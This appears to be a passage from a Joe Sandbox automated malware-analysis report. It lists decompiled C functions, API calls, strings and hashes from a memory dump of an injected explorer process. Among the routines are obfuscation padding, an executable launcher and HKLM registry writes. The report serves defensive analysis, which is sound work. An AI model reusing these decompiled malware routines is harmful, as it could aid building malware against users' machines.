Instruction Fuzzy Hash: CD310972D04218BBCB10EBE89C82F9DB7A8BB05731F204365FF25971C1D6706949A751

Uniqueness

Uniqueness Score: -1.00%

Function 00F6CAD7, Relevance: 9.1, APIs: 4, Strings: 2, Instructions: 106
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00F6CAD7(intOrPtr _a4, intOrPtr _a8) {
				char _v5;
				char _v20;
				short _v84;
				intOrPtr _t19;
				int _t22;
				intOrPtr _t23;
				void* _t25;
				intOrPtr* _t26;
				signed int _t27;
				intOrPtr _t37;
				char _t39;
				void* _t40;
				intOrPtr* _t46;
				int _t55;
				void* _t56;
				void* _t61;

				_t19 =  *0xf896f8; // 0x0
				_t39 = 0;
				if(_t19 == 0) {
					 *0xf896f8 = E00F5AC58(8);
					GetLastError();
					_t22 = E00F5ACD6(". r8JG4U1fMPzkkaN.d6wNkMtnbc43Z0Zz eGkBclqnrFJ 85 a  jTXDwV8JrcRTmPXNPgRivC7dNh5mMRqh,0PgwLgJdXAFZ y5GEAVKCSEWvucYc,WrviTqXqHWwN HjMQj6OIs0EGoYzyWbP3V6CDTa1J0cNuGxqghDsm,dF9z UuGmHg8G2snmRehJyIpPt.FKo vPX1fnH7d.rJKU90F0qlOv4JVn7dfSa2pxuq5EVF t38VS S6uLMw55Qon2S3XZRNUrCTPzdc4rdxORAnpDvZdKCMjpS0 09BGjCdqT,gBp 2 hO1ryL68B edP qvaqYoX.KuO,ZuJaA BSoaBi c4uy8hyY43O TvxkuLL vHta ujV4V6J,s16hgsD6A  BYv2U0vvrED,Zfy5K7kkG6GBTkjsn,MWEqHCGFUMtVAAplKYqQpoT1Bqd4wNCVCnBd2TfUaPsvDdNG4IaopUKhiKKZcMGUdnTMoFfSkzAJ4GB5kQ6Lo 3REpW6yenjcwbbGTqOou9,JPTDFQZ8zwGXPo7mblB9GsG82 E1BrC0k9K YjtYv4R3tgwPLjl L3.G,EoNyOW7lk,LgNcFhhWvCVZQ.AaqOARioLSzWtP5a0aPvJr CQtixnM.3s  2OFICNnom1LaPFqQxC i0.72iiFEHNdm 2gwV LnTnJ,AIonYpWgwZHcmEdEU2S.KlQq10g8J9aRtBLHCbSAQagl0hC0MJmF9ED.dLuTglKwayB1vgDP.8zR3AL2e1mls4 kM q64a.tIHuJdl2T.uuZ6  FZyHhfFOrOJxj,R445KFNVL,qc4D, VdYRmJJV4TaTX,OdX0xVdErRHzTNzBE,MHeWbm5bcJvjQEGt5QBj1Io9yptU.pPH0BbPV. wEAxhMl7uDHD6UU7Wxcg X 2d1PNjNpOB0cQ HNel0L8d0I9 0 u4,3.7o81uP2.V bQdZcIjbrsKyJmLu9cQ59ftbCTBL5xuUs grLBpmA4WUWyn39BNv5LBoZ6P,jF8VgX9bJ,xXrdNU2Z k5qVr6wc1gFAf nE2qKP01K9ofSO1Cl0d.RQ.7aHhC0LSdOCekqzks4 arIrVh2ulE3gu,2elnapK41ZuS,hq3Ss8Jj2vd.PsK4klqg n oAl4eRD.mYGMvdP6CvlfkB9mm3Dsfi8Z85Bv3c867CjmqERZY pkzU3mzKXz,E  7CGG33veFF52Zr,nhaSVE4SaWa,eYaprLVLTs74tnu vLqGfHv9 Ie4rOGhonLci0wpPcR2Cn84IJtk JGZFpavc3Oy4lcT6cf MAHE WCFwQT 2ueY7G6wkI3SbVKJXuWNDd8vjKWKK8cf2x e,ANeQl60hpWoimMi1EruCDmHvcrq OwNQ,N7Kw1n4c4uty0x.IHowNaMCjTk5,Bk5tGCHtc0rv7Jwb srH,SVt 6uL7vRT6k 9.vaik3Fybwqd4aw1NQ J nW6YDPMTpRPN,t,j0GwGXs8 LozA wxf7x7PgO6aaqW,4e4lHavxRSXw1SDpQoDkE583xHxf");
					_t55 = 0xf;
					if(_t22 <= _t55) {
						_t55 = _t22;
					}
					_v5 = _t39;
					if(_t55 == 0) {
						L12:
						if( *0xf896f8 != 0) {
							L2:
							_t23 = E00F5AC29(_a4, _a8);
							_t46 =  *0xf896f8; // 0x0
							 *_t46 = _t23;
							GetLastError();
							_t25 = E00F5ACD6("Yuz u zCaDRWW I kR.o6dIcMt GOU NLwVWcxqv3 kz,GQ.OU1Ef2x6UfwPL.Xp7e92U0MpsjhbYZzgzZA,IfgV02FLz57HXbb2,Xv8aXlc.V9rU1NTF8U7i7L.kcHI823vnkaXm,Bi myUYGREN5oOUKmFBv5Uwdx8TsahQLjI0pKHNGGEfb6blJ9fuPVCLDzWjDL5cLXXFTTe0t XGqcvVjUCovlNfU2 k7x BGtw ctqhbpwUv5B.rgu GI.,gfY9 RbCeumsRLlxAOLbL KpdVfGch.bRfyOIhXDjlY1.EalJ2E7g Gdc HIO08f ohUFlz5sW.NsoG7odfWed0A Bitg Tp4FGLxcYG1FRdiOudA.rBc EBKEhMVBIjedDn4AGgcx8.8F3Su h,INq C3WwNUNuykErl.5t,R3STjtuW3Hne8zSdMhSA0ShzPucr547XjFIAnkZx0TExFAlN52lHr34W.1Mq9zUsf3hRSgo9g1NEEFFYDgLCQtGcaJGOgG0 MYyACcMpjQ2PrT9J2zP5DwPOl58XVjnrVDtsI DtFJl,ga8s QdAfaNvZi GA.12anAWVH4UjhuRP4E3itkVEIr.mH2jNn73YNnS5gpJOh9k7JwhEK KK 3,HlJKyNAPLQF6bhAOLH 3r5lMdTDgDiQ9GtiZUcYBsGKi B0En0YbCGeuDSF7i5dqVX4,mpygiu0MN 2V COhzAXAtt3ceycD3MHvwuBNXfF3F XPUVIO spkxJeMvhx6t.xaVVO0 .rZP8H GH4Uu5VOj  zFohy9UwJU4tqA Sd Tet6cxp8 7OxmIJ2ydzt 8KmVqflT 1b3af2JXubKa1uChzRQR.Krnv7qtnM3HwI b6zZJ1TrxkDR.uQLfw7h7dE1y wfm0cGxC3");
							_t56 = 0xf;
							if(_t25 <= _t56) {
								_t56 = _t25;
							}
							_t40 = 0;
							_v5 = 0;
							if(_t56 == 0) {
								L6:
								_t26 =  *0xf896f8; // 0x0
								_t48 =  *_t26;
								if( *_t26 == 0) {
									_t27 = 0xfffffffe;
								} else {
									_t53 = _a8;
									 *((intOrPtr*)(_t26 + 4)) = _a8;
									E00F6C963(_t48, _t53);
									_t27 = 0;
								}
								L15:
								return _t27;
							} else {
								do {
									_t6 = _t40 + 0x42; // 0x42
									 *((char*)(_t61 + _t40 - 0x10)) = _t6;
									MultiByteToWideChar(0, 0,  &_v20, 0xffffffff,  &_v84, 0x20);
									_t40 = _t40 + 1;
								} while (_t40 < _t56);
								goto L6;
							}
						}
						_t27 = _t22 | 0xffffffff;
						goto L15;
					} else {
						do {
							_t14 = _t39 + 0x42; // 0x42
							 *((char*)(_t61 + _t39 - 0x10)) = _t14;
							_t22 = MultiByteToWideChar(0, 0,  &_v20, 0xffffffff,  &_v84, 0x20);
							_t39 = _t39 + 1;
						} while (_t39 < _t55);
						goto L12;
					}
				}
				E00F5AB81(_t19,  *((intOrPtr*)(_t19 + 4)));
				_t37 =  *0xf896f8; // 0x0
				 *((intOrPtr*)(_t37 + 4)) = 0;
				goto L2;
			}

0x00f6cada
0x00f6caea
0x00f6caef
0x00f6cb85
0x00f6cb8a
0x00f6cb95
0x00f6cb9d
0x00f6cba0
0x00f6cba2
0x00f6cba2
0x00f6cba4
0x00f6cba9
0x00f6cbc9
0x00f6cbd0
0x00f6cb08
0x00f6cb0e
0x00f6cb15
0x00f6cb1b
0x00f6cb1d
0x00f6cb28
0x00f6cb30
0x00f6cb33
0x00f6cb35
0x00f6cb35
0x00f6cb37
0x00f6cb39
0x00f6cb3f
0x00f6cb5f
0x00f6cb5f
0x00f6cb64
0x00f6cb68
0x00f6cbdd
0x00f6cb6a
0x00f6cb6a
0x00f6cb6f
0x00f6cb72
0x00f6cb79
0x00f6cb79
0x00f6cbde
0x00f6cbe2
0x00f6cb41
0x00f6cb41
0x00f6cb43
0x00f6cb46
0x00f6cb58
0x00f6cb5a
0x00f6cb5b
0x00000000
0x00f6cb41
0x00f6cb3f
0x00f6cbd6
0x00000000
0x00f6cbab
0x00f6cbab
0x00f6cbad
0x00f6cbb0
0x00f6cbc2
0x00f6cbc4
0x00f6cbc5
0x00000000
0x00f6cbab
0x00f6cba9
0x00f6caf9
0x00f6cafe
0x00f6cb05
0x00000000

APIs

GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00F55F36,00000000), ref: 00F6CB1D
MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00000020), ref: 00F6CB58
GetLastError.KERNEL32(00000000,?,00000000), ref: 00F6CB8A
MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00000020), ref: 00F6CBC2

Part of subcall function 00F5AB81: RtlFreeHeap.NTDLL(00000000,00000000,00F7B218,0000011C), ref: 00F5ABC7

Strings

. r8JG4U1fMPzkkaN.d6wNkMtnbc43Z0Zz eGkBclqnrFJ 85 a jTXDwV8JrcRTmPXNPgRivC7dNh5mMRqh,0PgwLgJdXAFZ y5GEAVKCSEWvucYc,WrviTqXqHWwN HjMQj6OIs0EGoYzyWbP3V6CDTa1J0cNuGxqghDsm,dF9z UuGmHg8G2snmRehJyIpPt.FKo vPX1fnH7d.rJKU90F0qlOv4JVn7dfSa2pxuq5EVF t38VS S6uLMw55Qon2, xrefs: 00F6CB90
Yuz u zCaDRWW I kR.o6dIcMt GOU NLwVWcxqv3 kz,GQ.OU1Ef2x6UfwPL.Xp7e92U0MpsjhbYZzgzZA,IfgV02FLz57HXbb2,Xv8aXlc.V9rU1NTF8U7i7L.kcHI823vnkaXm,Bi myUYGREN5oOUKmFBv5Uwdx8TsahQLjI0pKHNGGEfb6blJ9fuPVCLDzWjDL5cLXXFTTe0t XGqcvVjUCovlNfU2 k7x BGtw ctqhbpwUv5B.rgu GI.,gfY, xrefs: 00F6CB23, 00F6CB6E

Memory Dump Source

Source File: 00000004.00000002.514032061.0000000000F50000.00000040.00000001.sdmp, Offset: 00F50000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_f50000_explorer.jbxd

Yara matches

Similarity

API ID: ByteCharErrorLastMultiWide$FreeHeap
String ID: . r8JG4U1fMPzkkaN.d6wNkMtnbc43Z0Zz eGkBclqnrFJ 85 a jTXDwV8JrcRTmPXNPgRivC7dNh5mMRqh,0PgwLgJdXAFZ y5GEAVKCSEWvucYc,WrviTqXqHWwN HjMQj6OIs0EGoYzyWbP3V6CDTa1J0cNuGxqghDsm,dF9z UuGmHg8G2snmRehJyIpPt.FKo vPX1fnH7d.rJKU90F0qlOv4JVn7dfSa2pxuq5EVF t38VS S6uLMw55Qon2$Yuz u zCaDRWW I kR.o6dIcMt GOU NLwVWcxqv3 kz,GQ.OU1Ef2x6UfwPL.Xp7e92U0MpsjhbYZzgzZA,IfgV02FLz57HXbb2,Xv8aXlc.V9rU1NTF8U7i7L.kcHI823vnkaXm,Bi myUYGREN5oOUKmFBv5Uwdx8TsahQLjI0pKHNGGEfb6blJ9fuPVCLDzWjDL5cLXXFTTe0t XGqcvVjUCovlNfU2 k7x BGtw ctqhbpwUv5B.rgu GI.,gfY
API String ID: 1246267425-1020173320
Opcode ID: b25c8f11f17d54ee502ed6d245418274dc8145c92d33d533789abc518ba3fc67
Instruction ID: 8231dd5a3d36fc569c1273e8dc306c8535283216f4b54e2e01fcc48d6a635472
Opcode Fuzzy Hash: b25c8f11f17d54ee502ed6d245418274dc8145c92d33d533789abc518ba3fc67
Instruction Fuzzy Hash: 79313D3250820C6FDB04CBE8ACC2F7977A5FB84770F244229F6658B1D1E6B0D444B795

Uniqueness

Uniqueness Score: -1.00%

Function 00F625E7, Relevance: 9.1, APIs: 6, Instructions: 83memoryCOMMON

Download Yara Rule

APIs

SysAllocString.OLEAUT32(?), ref: 00F625FD
SysAllocString.OLEAUT32(00000000), ref: 00F62605
SysAllocString.OLEAUT32(00000000), ref: 00F62619
SysFreeString.OLEAUT32(00000000), ref: 00F62693
SysFreeString.OLEAUT32(00000000), ref: 00F62698
SysFreeString.OLEAUT32(00F623B9), ref: 00F6269D

Memory Dump Source

Source File: 00000004.00000002.514032061.0000000000F50000.00000040.00000001.sdmp, Offset: 00F50000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_f50000_explorer.jbxd

Yara matches

Similarity

API ID: String$AllocFree
String ID:
API String ID: 344208780-0
Opcode ID: e901972c59eea25d2735c6e829844ebef1595a50246a4bb282c54e6ae4a59197
Instruction ID: c1593a0b3006730146090f0a82a1379d98733eafb4788cd1f1d316bedd73646a
Opcode Fuzzy Hash: e901972c59eea25d2735c6e829844ebef1595a50246a4bb282c54e6ae4a59197
Instruction Fuzzy Hash: 6D21F071D00219AFCF00DFE5CC898AEBFB9FF08254B10449AF905AB250D6359E51EBA0

Uniqueness

Uniqueness Score: -1.00%

Function 00F51954, Relevance: 9.0, APIs: 4, Strings: 1, Instructions: 238
windowCOMMON

Download Yara Rule

C-Code - Quality: 85%

			E00F51954(intOrPtr* _a4) {
				char _v328;
				struct HDC__* _v432;
				struct HDC__* _v440;
				struct HDC__* _v444;
				struct HDC__* _v452;
				char _v456;
				char _v460;
				char _v464;
				struct HDC__* _v468;
				char _v472;
				char _v476;
				char _v480;
				signed int _v484;
				char _v488;
				char _v492;
				char _v496;
				char _v500;
				struct HDC__* _v504;
				intOrPtr _v516;
				intOrPtr _v524;
				char _v536;
				void* __edi;
				void* __esi;
				intOrPtr _t67;
				char _t72;
				char _t75;
				intOrPtr _t84;
				void* _t91;
				char _t92;
				char* _t93;
				void* _t97;
				void* _t103;
				intOrPtr _t116;
				void* _t119;
				char _t136;
				char _t138;
				signed int _t144;
				void* _t146;
				void* _t147;
				void* _t149;

				_t146 = (_t144 & 0xfffffff8) - 0x1d4;
				_v432 = 0;
				_v468 = 0;
				_v456 = 0;
				_v452 = 0;
				_v444 = 0;
				_v440 = 0;
				BitBlt(0, 3, 0x50, 9, 0x43, 0, 0x31, 0x4a, 0x15);
				_t117 = _a4;
				_t66 =  *_a4;
				if( *_a4 <= 1) {
					L3:
					_t67 =  *0xf89720; // 0xf90000
					E00F5B4BE( &_v456, 2, 0x14, 0x1e, _t67 + 0x648);
					_t72 = E00F5D2EE( *((intOrPtr*)( *((intOrPtr*)(_a4 + 4)))),  &_v472);
					_t147 = _t146 + 0x18;
					_v464 = _t72;
					if(_t72 != 0) {
						_v480 = E00F5B550(_v488);
						_pop(_t119);
						_t75 = E00F5B09B(_t119,  &_v492);
						_v476 = _t75;
						if(_t75 != 0) {
							_v484 = 0;
							if(_v492 > 0) {
								while(_v468 == 0) {
									_push(0);
									_push(L".exe");
									_push( &_v456);
									_push("\\");
									_t138 = E00F5B60A( *((intOrPtr*)(_v476 + _v484 * 4)));
									_t147 = _t147 + 0x14;
									_v496 = _t138;
									if(_t138 != 0) {
										_t91 = E00F5D25A(_t138, _v464, _v472);
										_t147 = _t147 + 0xc;
										if(_t91 >= 0) {
											if(_v480 == 0) {
												_t92 = E00F5B6B3(_t138);
											} else {
												_push(0);
												_push(_v480);
												_push(0xf722ac);
												_t92 = E00F5B60A(_t138);
												_t147 = _t147 + 0x10;
											}
											_v500 = _t92;
											if(_t92 == 0) {
												goto L9;
											} else {
												_t97 = E00F5BAA0(_v500,  &_v460, 0x2710, 1);
												_t149 = _t147 + 0x10;
												if(_t97 != 0) {
													L21:
													_v468 = 1;
													_v504 = 0;
													E00F5AB81( &_v500, 0xfffffffe);
													E00F5AB81( &_v496, 0xfffffffe);
													_t147 = _t149 + 0x10;
												} else {
													_t103 = E00F5BAA0(_v500,  &_v460, 0x2710, 0);
													_t149 = _t149 + 0x10;
													if(_t103 != 0) {
														goto L21;
													} else {
														_v504 = 0xfffffff9;
														E00F5AB81( &_v496, 0xfffffffe);
														BitBlt(0, 0x14, 0xb, 0x19, 0x2f, 0, 0x55, 0x43, 0x13);
														_t93 =  &_v536;
														goto L11;
													}
												}
											}
										} else {
											__imp__GetCPInfoExA(9, 0x42,  &_v328);
											_v516 = 0xfffffffb;
											goto L10;
										}
									} else {
										L9:
										_v504 = 0xfffffffd;
										L10:
										_t93 =  &_v496;
										L11:
										E00F5AB81(_t93, 0xfffffffe);
									}
									_v484 = _v484 + 1;
									if(_v484 < _v492) {
										continue;
									}
									goto L23;
								}
							}
						}
					} else {
						_v504 = 0xfffffffe;
					}
					L23:
					E00F5AB81( &_v480, 0xfffffffe);
					E00F5AB81( &_v488, 0xffffffff);
					E00F5AB81( &_v464, _v472);
					_t136 = _v476;
					if(_t136 != 0) {
						if(_v492 > 0) {
							_t116 = _v492;
							do {
								E00F5AB81(_t136, 0xfffffffe);
								_t136 = _t136 + 4;
								_t116 = _t116 - 1;
							} while (_t116 != 0);
						}
						E00F5AB81( &_v476, 0);
					}
					E00F5B78C(_a4, _a4 + 4);
					_t84 = _v504;
				} else {
					_v488 = E00F5B8AE( *((intOrPtr*)(_t117 + 4)) + 4, _t66 - 1);
					Arc(0, 0x1d, 0xf, 0x13, 0x58, 0x10, 0x59, 0x28, 0x1f);
					if(_v524 != 0) {
						goto L3;
					} else {
						_t84 = 0xfffffffd;
					}
				}
				return _t84;
			}

0x00f5195a
0x00f5197b
0x00f5197f
0x00f51983
0x00f51987
0x00f5198b
0x00f5198f
0x00f51993
0x00f51995
0x00f51998
0x00f5199d
0x00f519d8
0x00f519d8
0x00f519ed
0x00f519ff
0x00f51a04
0x00f51a07
0x00f51a0d
0x00f51a25
0x00f51a29
0x00f51a2f
0x00f51a35
0x00f51a3b
0x00f51a41
0x00f51a49
0x00f51a4f
0x00f51a5d
0x00f51a5e
0x00f51a67
0x00f51a6c
0x00f51a79
0x00f51a7b
0x00f51a7e
0x00f51a84
0x00f51aaa
0x00f51aaf
0x00f51ab4
0x00f51ad6
0x00f51aee
0x00f51ad8
0x00f51ad8
0x00f51ad9
0x00f51add
0x00f51ae3
0x00f51ae8
0x00f51ae8
0x00f51af4
0x00f51afa
0x00000000
0x00f51afc
0x00f51b0d
0x00f51b12
0x00f51b17
0x00f51b61
0x00f51b68
0x00f51b70
0x00f51b74
0x00f51b80
0x00f51b85
0x00f51b19
0x00f51b24
0x00f51b29
0x00f51b2e
0x00000000
0x00f51b30
0x00f51b37
0x00f51b3f
0x00f51b56
0x00f51b58
0x00000000
0x00f51b58
0x00f51b2e
0x00f51b17
0x00f51ab6
0x00f51ac2
0x00f51ac8
0x00000000
0x00f51ac8
0x00f51a86
0x00f51a86
0x00f51a86
0x00f51a8e
0x00f51a8e
0x00f51a92
0x00f51a95
0x00f51a9b
0x00f51b88
0x00f51b94
0x00000000
0x00000000
0x00000000
0x00f51b94
0x00f51a4f
0x00f51a49
0x00f51a0f
0x00f51a0f
0x00f51a0f
0x00f51b9a
0x00f51ba1
0x00f51bad
0x00f51bbb
0x00f51bc0
0x00f51bc9
0x00f51bcf
0x00f51bd1
0x00f51bd5
0x00f51bd8
0x00f51bde
0x00f51be1
0x00f51be2
0x00f51bd5
0x00f51beb
0x00f51bf1
0x00f51bf9
0x00f51bfe
0x00f5199f
0x00f519c0
0x00f519c4
0x00f519ce
0x00000000
0x00f519d0
0x00f519d2
0x00f519d2
0x00f519ce
0x00f51c09

APIs

BitBlt.GDI32(00000000,00000003,00000050,00000009,00000043,00000000,00000031,0000004A,00000015), ref: 00F51993
Arc.GDI32(00000000,0000001D,0000000F,00000013,00000058,00000010,00000059,00000028,0000001F), ref: 00F519C4

Strings

.exe, xrefs: 00F51A5E

Memory Dump Source

Source File: 00000004.00000002.514032061.0000000000F50000.00000040.00000001.sdmp, Offset: 00F50000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_f50000_explorer.jbxd

Yara matches

Similarity

API ID:
String ID: .exe
API String ID: 0-4119554291
Opcode ID: bb8f7503d28ec1e3a82cdec4e155a1ccb2e0ca4f4335b9d0bd6c260ac55d04bc
Instruction ID: 1ecccb21506dcdab6bbf3ee9a48fff50b9d39df791baf27bacd0d4fd05de2a56
Opcode Fuzzy Hash: bb8f7503d28ec1e3a82cdec4e155a1ccb2e0ca4f4335b9d0bd6c260ac55d04bc
Instruction Fuzzy Hash: EF81C171909305BBD620DF14CC42F5F77E8FB89B22F100A1AFB54961D1E774E509AB92

Uniqueness

Uniqueness Score: -1.00%

Function 00F5A7E4, Relevance: 9.0, APIs: 3, Strings: 2, Instructions: 205
registryCOMMON

Download Yara Rule

C-Code - Quality: 83%

			E00F5A7E4(void* __ecx, void* _a4, short* _a8, short* _a12, int _a16, char* _a20, int _a24) {
				signed int _v8;
				void* _v12;
				char _v16;
				char _v20;
				char _v24;
				char _v28;
				char _v156;
				signed int _t68;
				intOrPtr _t70;
				intOrPtr _t75;
				signed int _t76;
				signed int _t77;
				void* _t81;
				void* _t82;
				void* _t83;
				void* _t84;
				char _t88;
				signed int _t99;
				void* _t102;
				signed int _t104;
				void* _t112;
				void* _t113;
				void* _t114;
				char _t118;
				intOrPtr _t122;
				void* _t128;
				intOrPtr _t129;
				intOrPtr _t131;
				int _t143;
				char* _t146;
				signed int _t147;
				void* _t148;
				void* _t151;
				void* _t152;
				void* _t154;

				if(_a4 != 0x80000002) {
					L27:
					_t143 = 0;
					L28:
					_t68 = RegOpenKeyExW(_a4, _a8, _t143, 2,  &_v12);
					if(_t68 == 0) {
						if(_a20 == _t143) {
							if(RegDeleteValueW(_v12, _a12) == 0) {
								L37:
								L34:
								_t70 =  *0xf8974c; // 0x547f890
								 *((intOrPtr*)(_t70 + 0x1c))(_v12);
								return 0;
							}
							_push(0xfffffffd);
							L33:
							_pop(0);
							goto L34;
						}
						if(RegSetValueExW(_v12, _a12, _t143, _a16, _a20, _a24) == 0) {
							goto L37;
						}
						_push(0xfffffffe);
						goto L33;
					}
					return _t68 | 0xffffffff;
				}
				_t75 =  *0xf89720; // 0xf90000
				if( *((short*)(_t75 + 0x9c)) != 9) {
					goto L27;
				}
				_t76 =  *0xf89740; // 0x547f6c8
				_t143 = 0;
				if( *((intOrPtr*)(_t76 + 0x6c)) == 0) {
					goto L28;
				}
				_t146 = _a20;
				_v28 = 0;
				_v8 = 0;
				if(_t146 == 0) {
					L21:
					_t77 = _v8;
					L22:
					return _t77;
				}
				if( *((intOrPtr*)(_t76 + 0x60)) == 0 ||  *((intOrPtr*)(_t76 + 0x64)) == 0) {
					_t77 = _t76 | 0xffffffff;
					goto L22;
				} else {
					_a4 = E00F62CCE(__ecx, 0xcd4);
					if(_a16 != 4) {
						if(_a16 != 1) {
							_push(0xfffffffc);
							L25:
							_pop(_t147);
							E00F5BA86( &_a4);
							_t77 = _t147;
							goto L22;
						}
						_t122 =  *0xf89720; // 0xf90000
						_t81 = E00F5ADF7(_t122 + 0x1020);
						_t17 = _t146 + 0x28; // 0xf6cd21
						_t82 = E00F5ADF7(_t17);
						_t83 = E00F5ADF7(_a4);
						_t84 = E00F5ADF7(_a8);
						_t148 = _t81 + _t82 + _t83 + _t84 + E00F5ADF7(_a12) + 1;
						L10:
						_t118 = E00F5AC58(_t148 + _t148 + 2);
						_pop(_t128);
						_v20 = _t118;
						if(_t118 != _t143) {
							_t88 = E00F62CCE(_t128, 0xd0e);
							_t129 =  *0xf89720; // 0xf90000
							_v24 = _t88;
							_t144 = E00F5CE46(_t118, _t148, _t88, _t129 + 0x1020);
							_t152 = _t151 + 0x14;
							if(_t89 <= 0) {
								_v8 = 0xfffffffa;
							} else {
								if(_a16 != 4) {
									_push(_a20);
									_push(_a12);
									_push(L"REG_SZ");
									E00F5CE46(_t118 + _t144 * 2, _t148 - _t144, _a4, _a8);
									_t154 = _t152 + 0x1c;
								} else {
									E00F5CE46( &_v156, 0x40, L"%u",  *_a20);
									_push( &_v156);
									_push(_a12);
									_push(L"REG_DWORD");
									E00F5CE46(_t118 + _t144 * 2, _t148 - _t144, _a4, _a8);
									_t154 = _t152 + 0x2c;
								}
								_t99 =  *0xf89740; // 0x547f6c8
								 *((intOrPtr*)(_t99 + 0x60))( &_v16);
								_t102 = E00F5BAA0(_t118,  &_v28, 0x1388, 1);
								_t152 = _t154 + 0x10;
								if(_t102 == 0) {
									_v8 = 0xfffffff9;
								}
								_t104 =  *0xf89740; // 0x547f6c8
								 *((intOrPtr*)(_t104 + 0x64))( &_v16);
							}
							E00F5AB81( &_v20, 0xfffffffe);
							E00F5BA86( &_v24);
							E00F5BA86( &_a4);
							goto L21;
						}
						_push(0xfffffffb);
						goto L25;
					}
					_t131 =  *0xf89720; // 0xf90000
					_t112 = E00F5ADF7(_t131 + 0x1020);
					_t113 = E00F5ADF7(_a4);
					_t114 = E00F5ADF7(_a8);
					_t148 = _t112 + _t113 + _t114 + E00F5ADF7(_a12) + 0x29;
					goto L10;
				}
			}

0x00f5a7f6
0x00f5a9ff
0x00f5a9ff
0x00f5aa01
0x00f5aa0e
0x00f5aa16
0x00f5aa20
0x00f5aa5c
0x00f5aa62
0x00f5aa3f
0x00f5aa42
0x00f5aa47
0x00000000
0x00f5aa4a
0x00f5aa5e
0x00f5aa3e
0x00f5aa3e
0x00000000
0x00f5aa3e
0x00f5aa3a
0x00000000
0x00000000
0x00f5aa3c
0x00000000
0x00f5aa3c
0x00000000
0x00f5aa18
0x00f5a7fc
0x00f5a809
0x00000000
0x00000000
0x00f5a80f
0x00f5a814
0x00f5a819
0x00000000
0x00000000
0x00f5a81f
0x00f5a823
0x00f5a826
0x00f5a82b
0x00f5a9e1
0x00f5a9e1
0x00f5a9e4
0x00000000
0x00f5a9e4
0x00f5a834
0x00f5a9fa
0x00000000
0x00f5a843
0x00f5a852
0x00f5a855
0x00f5a890
0x00f5a9e9
0x00f5a9eb
0x00f5a9ee
0x00f5a9f0
0x00f5a9f6
0x00000000
0x00f5a9f6
0x00f5a896
0x00f5a8a2
0x00f5a8a7
0x00f5a8ac
0x00f5a8b6
0x00f5a8c0
0x00f5a8cf
0x00f5a8d3
0x00f5a8dd
0x00f5a8df
0x00f5a8e0
0x00f5a8e5
0x00f5a8f3
0x00f5a8f8
0x00f5a908
0x00f5a910
0x00f5a912
0x00f5a917
0x00f5a9ba
0x00f5a91d
0x00f5a921
0x00f5a961
0x00f5a966
0x00f5a96c
0x00f5a979
0x00f5a97e
0x00f5a923
0x00f5a936
0x00f5a941
0x00f5a942
0x00f5a947
0x00f5a957
0x00f5a95c
0x00f5a95c
0x00f5a985
0x00f5a98a
0x00f5a999
0x00f5a99e
0x00f5a9a3
0x00f5a9a5
0x00f5a9a5
0x00f5a9b0
0x00f5a9b5
0x00f5a9b5
0x00f5a9c7
0x00f5a9d0
0x00f5a9d9
0x00000000
0x00f5a9de
0x00f5a8e7
0x00000000
0x00f5a8e7
0x00f5a857
0x00f5a863
0x00f5a86d
0x00f5a877
0x00f5a886
0x00000000
0x00f5a886

APIs

RegOpenKeyExW.ADVAPI32(80000002,00F6CE1E,00000000,00000002,80000002,00000000,00000001), ref: 00F5AA0E
RegSetValueExW.ADVAPI32(80000002,00000000,00000000,80000001,00F6CCF9,?), ref: 00F5AA32
RegDeleteValueW.ADVAPI32(80000002,00000000), ref: 00F5AA54

Part of subcall function 00F5CE46: _vsnwprintf.MSVCRT ref: 00F5CE63

Strings

REG_SZ, xrefs: 00F5A96C
REG_DWORD, xrefs: 00F5A947

Memory Dump Source

Source File: 00000004.00000002.514032061.0000000000F50000.00000040.00000001.sdmp, Offset: 00F50000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_f50000_explorer.jbxd

Yara matches

Similarity

API ID: Value$DeleteOpen_vsnwprintf
String ID: REG_DWORD$REG_SZ
API String ID: 3817759962-1027521805
Opcode ID: fabed366be93b855b0591fd1e66fe457da7646ed74e5370af897eabe466e9fae
Instruction ID: b0bfe1961d9a165aaf622fe9291606491a55a9f85a15e8964ca7f713c3bdc8bc
Opcode Fuzzy Hash: fabed366be93b855b0591fd1e66fe457da7646ed74e5370af897eabe466e9fae
Instruction Fuzzy Hash: 2471A131900219EBCF10EFA8CC45DEE3BB5EF44326B104255FE1597192DB34D9A8EB92

Uniqueness

Uniqueness Score: -1.00%

Function 00F5A34A, Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 150
COMMON

Download Yara Rule

C-Code - Quality: 93%

			E00F5A34A(intOrPtr* _a4) {
				intOrPtr _v8;
				char _v9;
				char _v24;
				short _v88;
				char _v372;
				intOrPtr _t45;
				signed int _t82;
				intOrPtr _t83;
				intOrPtr _t90;
				void* _t98;
				intOrPtr* _t99;
				signed int _t100;
				intOrPtr _t101;
				void* _t102;
				void* _t103;
				void* _t104;

				_t101 =  *_a4;
				_t98 = 0xfffffffe;
				_t2 = _t101 + 0x44; // 0x44
				E00F5AB81(_t2, _t98);
				IsValidCodePage(9);
				_t3 = _t101 + 0x48; // 0x48
				E00F5AB81(_t3, _t98);
				GetLastError();
